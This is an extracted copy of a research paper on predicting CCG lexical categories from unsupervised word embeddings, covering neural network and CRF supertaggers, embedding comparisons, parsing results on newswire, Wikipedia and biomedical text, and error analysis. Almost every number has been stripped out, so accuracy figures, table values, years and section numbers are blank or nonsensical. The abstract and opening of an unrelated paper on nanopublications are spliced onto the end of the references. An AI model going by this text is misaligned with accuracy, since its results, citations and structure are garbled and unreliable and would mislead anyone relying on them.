many common words do not appear at all in the train- ing data of the penn treebank, such as ten, mili- tants, insight, and teenager. many others are not seen with all their possible uses—for example eu- ropean only occurs as an adjective, never a noun, meaning that the c&c parser is unable to analyse simple sentences like the director of the imf is tra- ditionally a european. these problems are particu- larly acute when parsing other domains (rimell and clark, ). . semi supervised nlp using word embeddings recent work has explored using vector space em- beddings for words as features in supervised mod- els for a variety of tasks, such as pos-tagging, chunking, named-entity recognition, semantic role labelling, and phrase structure parsing (turian et al., ; collobert et al., b; collobert, ; socher et al., ). the major motivation for us- ing these techniques has been to minimize the level of task-specific feature engineering required, as the same feature set can lead to good results on a variety of tasks. performance varies between tasks, but any gains over state-of-the-art traditional features have been small. a variety of techniques have been used for learning such embeddings from large unlabelled corpora, such as neural-network language models. models we introduce models for predicting ccg lexi- cal categories based on vector-space embeddings. the models can then be used to replace the pos- tagging and supertagging stages used by existing ccg parsers. we experiment with the neural net- work model proposed by collobert et al. ( b), and conditional random field (crf) model used by turian et al. ( ). we only use features that can be expected to work well out-of-domain—in particular, we use no lexical or pos features. . features our features are similar to those used by collobert et al. ( b) for pos-tagging. for every word in a context window, we add features for the embedding of the word, its -character suffix, and whether or not it is capitalised. we expect such features to gen- eralize well to other domains—and in section . we show that adding traditional pos-tag and lexical features does not help. to further reduce sparsity, we apply some simple preprocessing techniques. words are lower-cased , and all digits are replaced with . if an unknown word is hyphenated, we first try backing-off to the substring after the hyphen. for embeddings that include separate entries for the same word with different capitalization, we take the most frequently occur- ring version in the unlabelled corpus. colourless green ideas np s\np n context words lookup tables for embeddings and discrete features additional hidden layer output ccg categories figure : collobert et al. ( b)’s window approach network, applied to ccg supertagging. each context word ci is connected to one hidden node per dimension of the embedding eij with weight wij, and ad- ditional hidden nodes representing capitalization and suffix features. the weights wij are initialized using pre-trained word embeddings, but can be modified during supervised training. the additional hidden layer uses a hard-tanh activation function, and the output layer uses a softmax activation function. words which do not have an entry in the word em- beddings share an ‘unknown’ embedding. different ‘unknown’ vectors are used for capitalized and un- capitalized words, and non-alphabetic symbols. we also add entries for context words which are before the start and after the end of the sentence. 
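a rough sketch of this preprocessing and windowed feature extraction is given below; the function names, the unknown-word markers, the suffix length, and the window size are all hypothetical choices for illustration, not the authors' implementation:

```python
import re

def normalize(word):
    # lower-case the word and map every digit to 0, as described above
    return re.sub(r"\d", "0", word.lower())

def lookup_key(word, vocab):
    # return the key under which the word's embedding is looked up
    w = normalize(word)
    if w in vocab:
        return w
    if "-" in w:                                # back off for unknown hyphenated words
        tail = w.rsplit("-", 1)[-1]
        if tail in vocab:
            return tail
    if not any(c.isalpha() for c in word):      # separate unknown markers, as in the text
        return "<unk-symbol>"
    return "<unk-cap>" if word[:1].isupper() else "<unk>"

def window_features(words, i, vocab, window=5, suffix_len=2):
    # features for position i: for every context word, its embedding key, a short
    # suffix, and a capitalization flag; positions beyond the sentence use padding
    half = window // 2
    feats = []
    for j in range(i - half, i + half + 1):
        if j < 0 or j >= len(words):
            feats.append(("<pad>", "<pad>", False))
        else:
            w = words[j]
            feats.append((lookup_key(w, vocab), normalize(w)[-suffix_len:], w[:1].isupper()))
    return feats
```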
all of these were initialized to the ‘unknown’ vector in the pre-trained embeddings (or with gaussian noise if not available). . neural network model we predict word supertags with the neural network classifier used by collobert et al. ( b) for pos- tagging, as shown in figure . each feature is imple- mented as a lookup table, which maps context words onto vectors. the same lookup table parameters are used wherever a word appears in the context win- dow. word embeddings are implemented with a lookup table w ∈ rv ×d, where v is the size of the vo- cabulary, and d is the dimension of the word em- beddings. the parameters of the lookup table are initialized using unsupervised embeddings, but are modified during supervised training. as in collobert et al. ( b), non-embedding features ( -character suffixes and capitalization) are also each represented with lookup tables, which map each feature onto a k dimensional vector (as in col- lobert et al. ( b), we use k = ). lookup table parameters for non-embeddings features are initial- ized with gaussian noise. the first hidden layer therefore contains c×(d+ kf) nodes, where f is the number of discrete fea- tures and c is the size of the context window. we also experimented adding an additional hidden layer, with a hard-tanh activation function, which makes the classifier non-linear. finally, a logistic softmax layer is used for classifying output categories. the model is trained using stochastic gradient de- scent, with a learning rate of . , optimizing for cross-entropy. we use early-stopping as an alterna- tive to regularization—after each iteration the model is evaluated for accuracy on held-out data, and we use the best performing model. training was run until performance decreased on held-out data. . crf model the neural network model treats the probability of each supertag as being conditionally independent. however, conditioning on surrounding supertags embeddings model dimensionality training words training domain collobert&weston nnlm m wikipedia skip-gram skip gram b google news turian nnlm , , , m newswire hlbl hlbl , m newswire mikolov rnnlm , m broadcast news table : embeddings used in our experiments. dimensionality is the set of dimensions of the word em- bedding space that we experimented with, and training words refers to the size of the unlabelled corpus the embeddings were trained on. may be very useful—for example, a noun is much more likely to follow an adjective than a verb. cur- ran et al. ( ) report a large improvement using a maximum-entropy markov model for supertagging, conditioned on the surrounding supertags. we follow turian et al. ( ) in using a linear chain crf model for sequence classification using embeddings as features. this model does not al- low supervised training to fine-tune the embeddings, though it would be possible to build a crf/nn hy- brid that enabled this. we use the same feature set as with the neural network model—so the probabil- ity of a category depends on embeddings, capital- ization and suffix features—as well as the previous category. the model is trained using the averaged- perceptron algorithm (collins, ), again using early-stopping based on development data accuracy. experiments . domains we experiment with three domains: • ccgbank (hockenmaier and steedman, ), which is a conversion of the penn tree- bank (marcus et al., ) to ccg. section is used for evaluation. • wikipedia, using the corpus of sentences annotated with ccg derivations by honnibal et al. ( ). 
as the text is out-of-domain, parsing accuracy drops substantially on this corpus. • biomedical text, which is even less related to the newswire text than wikipedia, due to large numbers of unseen words and different writ- ing styles, causing low parsing accuracy. for parsing experiments, we use the bioinfer cor- pus (pyysalo et al., ) as a test set. for measuring supertagging accuracy, we use the ccg annotation produced by rimell and clark ( ). . neural network model parameters in this section, we explore how adjusting the pa- rameters of our neural network model affects -best lexical category accuracy on the section of ccg- bank (all development was done on this data). the c&c supertagger achieves . % accuracy on this task. the models were trained on sections - of ccgbank, and the reported numbers are the best accuracy achieved on section . as in clark and curran ( ), all models use only the most fre- quent categories in ccgbank. . . embeddings a number of word embeddings have recently been released, aiming to capture a variety of syntactic and semantic phenomena, based on neural network lan- guage models (nnlms) (turian et al., ; col- lobert et al., b), recurrent neural network lan- guage models (mikolov, ), the hierarchical log bilinear model (hlbl) (mnih and hinton, ), and mikolov et al. ( )’s skip gram model. how- ever, there has been a lack of experiments comparing which embeddings provide the most effective fea- tures for downstream tasks. first, we investigated the performance of several publicly available embeddings, to find which was most effective for supertagging. the embeddings we used are summarized in table . for efficiency, we used our simplest architecture, with no additional implemented using the torch library (collobert et al., a) embeddings category accuracy (window= ) category accuracy (window= ) collobert&weston . % . % skip gram . % . % turian- . % . % turian- . % . % turian- . % . % turian- . % . % hlbl- . % . % hlbl- . % . % mikolov- . % . % mikolov- . % . % table : comparison of different embeddings and context windows on section of ccgbank. ab- breviations such as turian- refer to the turian em- beddings with a -dimensional embedding space. hidden layer. we also investigate which size context window is most effective. results are shown in table , and show that the choice of embeddings is crucial to performance on this task. the performance of the turian and hlbl embeddings is surprisingly high given the relatively small amount of unlabelled data, suggesting that pa- rameters other than the size of the corpus are more important. of course, we have not performed a grid- search of the parameter space, and it is possible that other embeddings would perform better with differ- ent training data, dimensionality, or model architec- tures. the mikolov embeddings may suffer from be- ing trained on broadcast news, which has no punc- tuation and different language use. using a context window of words generally outperformed using a window of words (we also experimented with a word window, but found performance decreased slightly to . % for the turian- embeddings). there is no clear trend on the optimal dimension of the embedding space, and it is likely to vary with training methods and corpus size. next, we experimented with the size of the addi- tional hidden layer—for efficiency, using the turian- embeddings with a -word context window. re- sults are shown in table , and suggest that a hid- den layer is not useful for this task—possibly due to over-fitting. 
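to make the window-approach architecture of the previous subsection concrete, the following is a minimal pytorch sketch; the vocabulary size, embedding dimensionality, number of categories, window size, and learning rate are placeholders rather than the values used in the experiments:

```python
import torch
import torch.nn as nn

class WindowSupertagger(nn.Module):
    # window approach: one lookup table per feature type, applied to every context
    # position, concatenated, optionally passed through a hard-tanh hidden layer,
    # and classified over lexical categories with softmax/cross-entropy.
    def __init__(self, vocab_size=50000, emb_dim=50, n_suffixes=1000,
                 n_categories=400, window=5, feat_dim=5, hidden=0):
        super().__init__()
        self.word_emb = nn.Embedding(vocab_size, emb_dim)     # initialized from pre-trained vectors
        self.suffix_emb = nn.Embedding(n_suffixes, feat_dim)  # discrete features as small lookup tables
        self.cap_emb = nn.Embedding(2, feat_dim)
        in_dim = window * (emb_dim + 2 * feat_dim)
        if hidden > 0:
            self.body = nn.Sequential(nn.Linear(in_dim, hidden), nn.Hardtanh(),
                                      nn.Linear(hidden, n_categories))
        else:
            self.body = nn.Linear(in_dim, n_categories)        # no additional hidden layer

    def forward(self, words, suffixes, caps):
        # each argument holds integer feature ids of shape (batch, window)
        x = torch.cat([self.word_emb(words), self.suffix_emb(suffixes),
                       self.cap_emb(caps)], dim=-1)
        return self.body(x.flatten(1))                         # unnormalized category scores

model = WindowSupertagger()
optimizer = torch.optim.SGD(model.parameters(), lr=0.01)       # placeholder hyperparameters
loss_fn = nn.CrossEntropyLoss()                                # with early stopping on held-out data
```

the hidden argument corresponds to the additional hard-tanh layer discussed above; setting it to zero gives the purely linear variant.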
embeddings additional hidden layer size accuracy turian- . % turian- . % turian- . % turian- . % turian- . % table : comparison of different model architec- tures, using the turian embeddings and a -word context window. a size of means no additional hidden layer was used. in all subsequent experiments we used a context window of words, no additional hidden layer, and the turian- embeddings. . crf model we also experimented with the crf model for supertagging . training these models took far longer than our neural-network model, due to the need to use the forward-backward algorithm with a × -dimensional transition matrix during training (rather than considering each word’s cate- gory independently). consequently, we only exper- imented with the turian- embeddings with a - word context window, which attained the best per- formance using the neural network. we found that using the turian- embeddings gave a surprisingly weak performance of just . % (compared to . % for the neural network model). we hypothesised that one reason for this result could be that the model is unable to modify the embeddings during supervised training (in contrast to the neural-network model). consequently, we built a new set of embeddings, using the weight- matrix learned by our best neural network model. a new crf model was then trained using the tuned embeddings. performance then improved dramati- cally to . %, and slightly outperformed the neu- ral network—showing that while there is a small advantage to using sequence information, it is cru- cial to allow supervised training to modify the em- beddings. these results help explain why collobert et al. ( b)’s neural network models outperform turian et al. ( )’s sequence models—but greater implemented using crfsuite (okazaki, ) improvements may be possible with the combined approach we introduce here, which allows the model to both tune the embeddings and exploit sequence information. however, tagging with this model was considerably slower than the neural network (again, due to the cost of decoding), so we used the neural network architecture in the remaining experiments. . multitagging accuracy the c&c parser takes a set of supertags per word as input, which is used to prune the search space. if no parse is found, the sentence is supertagged again with a wider beam. the effectiveness of the pruning therefore depends on the accuracy of the supertagger at a given level of ambiguity. we experimented with the accuracy of different supertaggers at different levels of ambiguity. for the c&c supertagger, we vary the number of categories per word using the same back-off beam settings re- ported in clark and curran ( ). for our supertag- ger, we vary recall by adjusting the a variable-width beam, which removes tags whose probability is less than β times that of the most likely tag. results are shown in figure . the supertag- gers based on embeddings consistently match or out- perform the c&c supertagger at all levels of recall across all domains. while performance is similar with a small number of tags per word, our supertag- gers perform better with a more relaxed beam— perhaps representing cases which are challenging for the c&c model, such as pos-tag errors. . parsing accuracy we investigate whether our supertagger improves the performance of the c&c parser, by replacing the standard c&c supertagger with our model. 
this evaluation is somewhat indirect, as the parser does not make use of the supertagger probabilities for cat- egories, but instead simply uses it to prune the search space. however, we show that better pruning leads directly to better parsing accuracies. c&c parser results on ccgbank and wikipedia are reported using clark and curran ( )’s best performing hybrid model (trained on sections - ), with automatic pos-tags, and the parameters this model is not publicly available, so we re-trained it follow- ing the instructions at http://aclweb.org/aclwiki/ index.php?title=training_the_c&c_parser ccgbank section average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- wikipedia average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- biomedical average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different su- pertaggers across different domains. datapoints for the c&c parser use its standard back-off parameters. supertagger ccgbank wikipedia bioinfer f cov f f cov f f cov f (cov) (all) (cov) (all) (cov) (all) c&c . . . . . . . . . honnibal et al. ( ) . . - . . - - - - brown clusters . . . . . . . . . turian- embeddings . . . . . . . . . turian- + pos tags . . . . . . . . . turian- + frequent words . . . . . . . . . table : parsing f -scores for labelled dependencies across a range of domains, using the c&c parser with different supertaggers. embeddings models used a context window of words, and no additional hidden layer. following previous ccg parsing work, we report f -scores on the subset of sentences where the parser is able to produce a parse (f -cov), and the parser’s coverage (cov). where available we also report overall scores (f -all), including parser failures, which we believe gives a more realistic assessment. used in the published results. biomedical results use the publicly available parsing model, setting the ‘parser beam ratio’ parameter to − , which im- proved results on development data. to achieve full coverage on the wikipedia corpus, we increased the ‘max supercats’ parameter to . c&c accuracies differ very slightly from previously reported results, due to differences in the retrained models. as in clark and curran ( ), we use a variable- width beam β that prunes categories whose prob- ability is less than β times that of the most likely category. for simplicity, our supertaggers use the same β back-off parameters as are used by the c&c parser, though it is possible that further improve- ments could be gained by carefully tuning these pa- rameters. in contrast to the c&c supertaggers, we do not make use a tag-dictionaries. results are shown in table , and our supertag- gers consistently lead to improvements over the baseline parser across all domains, with larger im- provements out-of-domain. our best model also outperforms honnibal et al. ( )’s self-training approach to domain adaptation on wikipedia (which lowers performance on ccgbank). our results show that word embeddings are an ef- fective way of adding distributional information into ccg supertagging. a popular alternative approach we briefly experimented setting the β parameters to match the ambiguity of the c&c supertagger on section of ccgbank, which caused the f -score using the turian- embeddings to drop slightly from . to . . for semi-supervised learning is to use brown clus- ters (brown et al., ). 
to ensure a fair com- parison with the turian embeddings, we use clus- ters trained on the same corpus, and use a com- parable feature set (clusters, capitalization, and - character suffixes—all implemented as sparse bi- nary features). brown clusters are hierarchical, and following koo et al. ( ), we incorporate brown clusters features at multiple levels of granularity— using coarse clusters (loosely analogous to pos- tags) and fine-grained clusters. results show slightly lower performance than c&c in domain, but higher performance out of domain. however, they are substantially lower than results using the turian- embeddings. we also experimented with adding traditional word and pos features, which were implemented as sparse vectors for each word in the context win- dow. we found that including pos features (de- rived from the c&c pos-tagger) reduced accuracy across all domains. one reason is that pos tags are highly discriminative features, therefore errors can be hard to recover from. adding lexical features for the most frequent words had little impact on re- sults, showing that the embeddings already represent this information. for infrequent words, the c&c parser uses a hard constraint that only certain pos-tag/supertag com- binations are allowed. this constraint means that the parser may be particularly vulnerable to pos- words with incorrect pos tag ( %) average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different su- pertaggers, on words with incorrect pos tags. tag errors, as the model cannot override the hard- constraint. we therefore also ran the model allowing any pos-tag/supertag combination. we found that parsing accuracy was . higher on development data (and much slower), suggesting that the model itself is overly reliant on pos-features. . error analysis we have demonstrated that word embeddings are highly effective for ccg supertagging. in this sec- tion, we investigate several cases in which they are particularly helpful—by measuring supertagger performance when the pos tagger made mistakes, when words were unseen in the labelled data, and when the labelled data only contains the word with a different category. our supertaggers show substan- tial improvements over more complex existing mod- els. figure shows performance when the pos- tagger assigns the wrong tag to a word. both sys- tems show dramatically lower performance on these cases—the embeddings supertagger does not use pos features, but pos errors are likely to represent generally difficult examples. however, the embed- dings supertagger is almost % more accurate on this subset than the c&c supertagger, and with a re- laxed beam reaches % accuracy, showing the ad- vantages of avoiding a pipeline approach. in con- trast, the c&c tagger is not robust to pos tag- words only seen with other categories ( %) average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different su- pertaggers, on words that do occur in the training data, but not with the category required in the test data. ger errors, and asymptotes at just % accuracy. an alternative way of mitigating pos errors is to use a distribution over pos tags as features in the supertagger—curran et al. ( ) show that this technique improves supertagging accuracy by . % over the c&c baseline, but do not report the impact on parsing. 
figure shows performance when the a word has been seen in the training data, but only with a dif- ferent category from the instance in the test data (for example, european only occurs as a adjective in the training data, but it may occur as a noun in the test data). performance is even worse on these cases, which appear to be extremely difficult for existing models. the accuracy of the embeddings supertag- ger converges at just %, suggesting that our model has overfit the labelled data. however, it still out- performs the c&c supertagger by % with a beam allowing tags per word. the large jump in c&c supertagger performance for the final back-off level is due to a change in the word frequency threshold at which the c&c parser only considers word/category pairs that occur in the labelled data. figure gives results for cases where the word is unseen in the labelled data. the c&c supertag- ger performance is surprisingly good on such cases, suggesting that the morphological and context used unseen words ( %) average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different supertaggers, on words which are unseen in the la- belled data. is normally sufficient for inferring categories for un- seen words. however, our supertagger still clearly outperforms the c&c supertagger, suggesting that the large vocabulary of the unsupervised embed- dings helps it to generalize from the labelled data. we also investigated supertagging accuracy on different types of word—table shows several in- teresting cases. while performance on nouns is sim- ilar, our supertagger is substantially better on verbs. verbs can have many different ccg categories, de- pending on the number of arguments and tense, and not all valid word/category combinations will be seen in the labelled data. our embeddings allow the supertagger to learn generalizations, such as that transitive verbs can also often have intransitive uses. similarly, wh-words can have many possible cate- gories in complex constructions like relative clauses and pied-piping—and our embeddings may help the model generalize from having seen a category for which to one for whom. on the other hand, the c&c supertagger performs much better on prepositions. prepositions have different categories when appear- ing as arguments or adjuncts, and the distinction in the gold-standard was made using somewhat arbi- trary heuristics (hockenmaier and steedman, ). it seems our embeddings have failed to capture these subtleties. future work should explore methods for combining the strengths of each model. word type c&c accuracy turian- embeddings accuracy verbs . % . % nouns . % . % wh-words . % . % prepositions . % . % table : supertagging accuracy on different types of words, with an ambiguity of . tags per word (corresponding to the c&c’s initial beam setting). overall performance with this beam is almost iden- tical. words types were identified using gold pos tags, using in for prepositions. . discussion with a narrow supertagger beam, our method gives similar results to the c&c supertagger. however, it gains by being more accurate on difficult cases, due to not relying on lexical or pos features. these improvements lead directly to parser improvements. we identify two cases where our supertagger greatly outperforms the c&c parser: where the pos-tag is incorrect, and where the word-category pair is un- seen in the labelled data. 
our approach achieves larger improvements out-of-domain than in-domain, suggesting that the large vocabulary of embeddings built by the unsupervised pre-training allows it to better generalize from the labelled data. interestingly, the best-performing turian- em- beddings were trained on just m words of text (compared to b words for the skip-gram embed- dings), suggesting that further improvements may well be possible using larger unlabelled corpora. fu- ture work should investigate whether the models and embeddings that work well for supertagging gener- alize to other tasks. related work many methods have recently been proposed for im- proving supervised parsers with unlabelled data. most of these are orthogonal to our work, and larger improvements may be possible by combining them. thomforde and steedman ( ) extends a ccg lexicon by inferring categories for unseen words, based on the likely categories of surrounding words. unlike our method, this approach is able to learn categories which were unseen in the labelled data, which is shown to be useful for parsing a corpus of questions. deoskar et al. ( ) and deoskar et al. ( ) use viterbi-em to learn new lexical en- tries by running a generative parser over a large un- labelled corpus. they show good improvements in accuracy on unseen words, but not overall parsing improvements in-domain. their parsing model aims to capture non-local information about word usage, which would not be possible for the local context windows used to learn our embeddings. self-training is another popular method for do- main adaptation, and was used successfully by hon- nibal et al. ( ) to improve ccg parser perfor- mance on wikipedia. however, it caused a decrease in performance on the in-domain data, and our method achieves better performance across all do- mains. mcclosky et al. ( ) improve a penn tree- bank parser in-domain using self-training, but other work has failed to improve performance out-of- domain using self training (dredze et al., ). in a similar spirit to our work, koo et al. ( ) improve parsing accuracy using unsupervised word clus- ter features—we have shown that word-embeddings outperform brown clusters for ccg supertagging. an alternative approach to domain adaptation is to annotate a small corpus of out-of-domain text. rimell and clark ( ) argue that this annotation is simpler for lexicalized formalisms such as ccg, as large improvements can be gained from annotat- ing lexical categories, rather than full syntax trees. they achieve higher parsing accuracies than us on biomedical text, but our unsupervised method re- quires no annotation. it seems likely that our method could be further improved by incorporating out-of- domain labelled data (where available). the best reported ccg parsing results have been achieved with a model that integrates supertagging and parsing (auli and lopez, a; auli and lopez, b). this work still uses the same fea- ture set as the c&c parser, suggesting further im- provements may be possible by using our embed- dings features. auli and lopez pos-tag the sentence before parsing, but using our features would allow us to fully eliminate the current pipeline approach to ccg parsing. our work also builds on approaches to semi- supervised nlp using neural embeddings (turian et al., ; collobert et al., b). existing work has mainly focused on ‘flat’ tagging problems, with- out hierarchical structure. 
collobert ( ) gives a model for parsing using embeddings features, by treating each level of the parse tree as a sequence classification problem. socher et al. ( ) in- troduce a model in which context-free grammar parses are reranked based on compositional distri- butional representations for each node. andreas and klein ( ) experiment with a number of ap- proaches to improving the berkeley parser with word embeddings. such work has not improved over state-of-the-art existing feature sets for constituency parsing—although bansal et al. ( ) achieve good results for dependency parsing using embeddings. ccg categories contain much of the hierarchical structure needed for parsing, giving a simpler way to improve a parser using embeddings. conclusions we have shown that ccg parsing can be signif- icantly improved by predicting lexical categories based on unsupervised word embeddings. the re- sulting parsing pipeline is simpler, and has improved performance both in and out of domain. we ex- pect further improvements to follow as better word embeddings are developed, without other changes to our model. our approach reduces the problem of sparsity caused by the large number of ccg categories, suggesting that finer-grained categories could be created for ccgbank (in the spirit of hon- nibal et al. ( )), which lead to improved perfor- mance in downstream semantic parsers. future work should also explore domain-adaptation, either using unsupervised embeddings trained on out-of-domain text, or using supervised training on out-of-domain corpora. our results also have implications for other nlp tasks—suggesting that using word embeddings features may be particularly useful out-of-domain, in pipelines that currently rely on pos taggers, and in tasks which suffer from sparsity in the labelled data. code for our supertagger is released as part of the easyccg parser (lewis and steedman, ), available from: https://github.com/ mikelewis /easyccg acknowledgments we would like to thank tejaswini deoskar, bharat ram ambati, michael roth and the anonymous reviewers for helpful feedback on an earlier ver- sion of this paper. we also thank rahul jha for sharing his re-implementation of collobert et al. ( b)’s model, and stephen clark, laura rimell and matthew honnibal for making their out-of- domain ccg corpora available. references jacob andreas and dan klein. . how much do word embeddings encode about syntax. in proceedings of acl. michael auli and adam lopez. a. a comparison of loopy belief propagation and dual decomposition for integrated ccg supertagging and parsing. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies-volume , pages – . association for computational linguistics. michael auli and adam lopez. b. training a log- linear parser with loss functions via softmax-margin. in proceedings of the conference on empirical meth- ods in natural language processing, pages – . association for computational linguistics. srinivas bangalore and aravind k joshi. . su- pertagging: an approach to almost parsing. compu- tational linguistics, ( ): – . mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for depen- dency parsing. in proceedings of the annual meeting of the association for computational linguistics. johan bos. . wide-coverage semantic analysis with boxer. in johan bos and rodolfo delmonte, editors, semantics in text processing. 
step conference proceedings, research in computational semantics, pages – . college publications. p.f. brown, p.v. desouza, r.l. mercer, v.j.d. pietra, and j.c. lai. . class-based n-gram models of natural language. computational linguistics, ( ): – . stephen clark and james r curran. . wide- coverage efficient statistical parsing with ccg and log-linear models. computational linguistics, ( ): – . michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the acl- conference on empirical methods in natu- ral language processing-volume , pages – . asso- ciation for computational linguistics. ronan collobert, koray kavukcuoglu, and clément farabet. a. torch : a matlab-like environment for machine learning. in biglearn, nips workshop. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. b. natural language processing (almost) from scratch. the journal of machine learning research, : – . ronan collobert. . deep learning for effi- cient discriminative parsing. in geoffrey j. gordon, david b. dunson, and miroslav dudk, editors, ais- tats, volume of jmlr proceedings, pages – . jmlr.org. james r curran, stephen clark, and david vadas. . multi-tagging for lexicalized-grammar parsing. in proceedings of the st international conference on computational linguistics and the th annual meet- ing of the association for computational linguistics, pages – . association for computational lin- guistics. tejaswini deoskar, markos mylonakis, and khalil sima’an. . learning structural dependencies of words in the zipfian tail. in proceedings of the th international conference on parsing technolo- gies, pages – . association for computational lin- guistics. tejaswini deoskar, christos christodoulopoulos, alexandra birch, and mark steedman. . gener- alizing a strongly lexicalized parser using unlabeled data. in proceedings of the th conference of the european chapter of the association for compu- tational linguistics. association for computational linguistics. mark dredze, john blitzer, partha pratim talukdar, kuz- man ganchev, joao graca, and fernando pereira. . frustratingly hard domain adaptation for depen- dency parsing. in emnlp-conll, pages – . julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. compu- tational linguistics, ( ): – . matthew honnibal, joel nothman, and james r cur- ran. . evaluating a statistical ccg parser on wikipedia. in proceedings of the workshop on the people’s web meets nlp: collaboratively con- structed semantic resources, pages – . associa- tion for computational linguistics. m. honnibal, j.r. curran, and j. bos. . rebanking ccgbank for improved np interpretation. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . associa- tion for computational linguistics. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning, emnlp- conll ’ , pages – . association for compu- tational linguistics. tom kwiatkowski, luke zettlemoyer, sharon goldwa- ter, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. 
in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – . association for com- putational linguistics. tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on- the-fly ontology matching. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , seattle, wash- ington, usa, october. association for computational linguistics. mike lewis and mark steedman. a. combined distributional and logical semantics. transactions of the association for computational linguistics, : – . mike lewis and mark steedman. b. unsupervised induction of cross-lingual semantic relations. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa, october. association for computational linguistics. mike lewis and mark steedman. . a* ccg pars- ing with a supertag-factored model. in proceedings of the conference on empirical methods in natural language processing (emnlp), doha, qatar, octo- ber. mitchell p marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in proceed- ings of the main conference on human language tech- nology conference of the north american chapter of the association of computational linguistics, pages – . association for computational linguistics. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomáš mikolov. . statistical language models based on neural networks. ph.d. thesis, ph. d. the- sis, brno university of technology. andriy mnih and geoffrey e hinton. . a scal- able hierarchical distributed language model. in nips, pages – . joakim nivre, laura rimell, ryan mcdonald, and carlos gómez rodrı́guez. . evaluation of dependency parsers on unbounded dependencies. in proceedings of the rd international conference on computa- tional linguistics (coling ), pages – , bei- jing, china, august. coling organizing commit- tee. naoaki okazaki. crfsuite: a fast implementation of conditional random fields (crfs). sampo pyysalo, filip ginter, juho heimonen, jari björne, jorma boberg, jouni järvinen, and tapio salakoski. . bioinfer: a corpus for information extraction in the biomedical domain. bmc bioinfor- matics, ( ): . laura rimell and stephen clark. . adapting a lexicalized-grammar parser to contrasting domains. in proceedings of the conference on empirical methods in natural language processing, pages – . as- sociation for computational linguistics. laura rimell and stephen clark. . porting a lexicalized-grammar parser to the biomedical domain. journal of biomedical informatics, ( ): – . laura rimell, stephen clark, and mark steedman. . unbounded dependency recovery for parser evalua- tion. in proceedings of the conference on empirical methods in natural language processing: volume -volume , pages – . association for computational linguistics. richard socher, john bauer, christopher d manning, and andrew y ng. . parsing with compositional vec- tor grammars. in in proceedings of the acl confer- ence. citeseer. emily thomforde and mark steedman. . semi- supervised ccg lexicon extension. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – . 
association for computational linguistics. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computa- tional linguistics. submitted february accepted july published august corresponding author tobias kuhn, kuhntobias@gmail.com academic editor luc moreau additional information and declarations can be found on page doi . /peerj-cs. copyright kuhn et al. distributed under creative commons cc-by . open access decentralized provenance-aware publishing with nanopublications tobias kuhn , christine chichester , michael krauthammer , , núria queralt-rosinach , ruben verborgh , george giannakopoulos , , axel-cyrille ngonga ngomo , raffaele viglianti and michel dumontier department of computer science, vu university amsterdam, amsterdam, netherlands nestle institute of health sciences, lausanne, switzerland yale university school of medicine, yale university, new haven, ct, united states yale program in computational biology and bioinformatics, yale university, new haven, ct, united states research programme on biomedical informatics, hospital del mar medical research institute, universitat pompeu fabra, barcelona, spain data science lab, ghent university, ghent, belgium institute of informatics and telecommunications, ncsr demokritos, athens, greece scify private not-for-profit company, athens, greece aksw research group, university of leipzig, leipzig, germany maryland institute for technology in the humanities, university of maryland, college park, md, united states stanford center for biomedical informatics research, stanford university, stanford, ca, united states abstract publication and archival of scientific results is still commonly considered the respons- ability of classical publishing companies. classical forms of publishing, however, which center around printed narrative articles, no longer seem well-suited in the digital age. in particular, there exist currently no efficient, reliable, and agreed-upon methods for publishing scientific datasets, which have become increasingly important for science. in this article, we propose to design scientific data publishing as a web-based bottom-up process, without top-down control of central authorities such as publishing companies. based on a novel combination of existing concepts and technologies, we present a server network to decentrally store and archive data in the form of nanopublications, an rdf-based format to represent scientific data. we show how this approach allows researchers to publish, retrieve, verify, and recombine datasets of nanopublications in a reliable and trustworthy manner, and we argue that this architecture could be used as a low-level data publication layer to serve the semantic web in general. our evaluation of the current network shows that this system is efficient and reliable. subjects bioinformatics, computer networks and communications, digital libraries, world wide web and web science keywords data publishing, nanopublications, provenance, linked data, semantic web introduction modern science increasingly depends on datasets, which are however left out in the classical way of publishing, i.e., through narrative (printed or online) articles in journals or conference proceedings. 
